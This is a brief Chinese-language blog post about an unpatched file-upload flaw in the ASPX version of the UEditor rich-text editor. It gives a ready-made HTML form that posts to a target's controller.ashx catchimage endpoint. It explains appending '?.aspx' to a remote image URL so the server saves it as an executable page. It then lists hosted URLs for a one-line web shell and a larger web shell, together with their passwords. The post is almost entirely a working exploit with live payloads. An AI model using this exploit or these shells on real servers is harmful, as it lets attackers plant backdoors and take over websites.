ueditor 上传漏洞

| 热度 | 字数统计: 127 字 | 阅读时长: 1 分

ueditor ASPX 版本由于远程抓取代码缺陷导致的安全漏洞, 官方仍未修复

controller.ashx 文件默认在网站根目录

输入框里填写远程图片地址 + ?.aspx, 如 http://exp10it.cn/1.gif?.aspx

1
2
3
4
<form action="http://target/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>

一句话 密码 xz

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/1.gif?.aspx

大马 密码 r00ts

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/2.gif?.aspx

本文标题:ueditor 上传漏洞

文章作者:X1r0z

发布时间:2018年10月01日

原始链接:https://exp10it.cn/2018/10/01/2018-10-01-ueditor-aspx-upload/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者.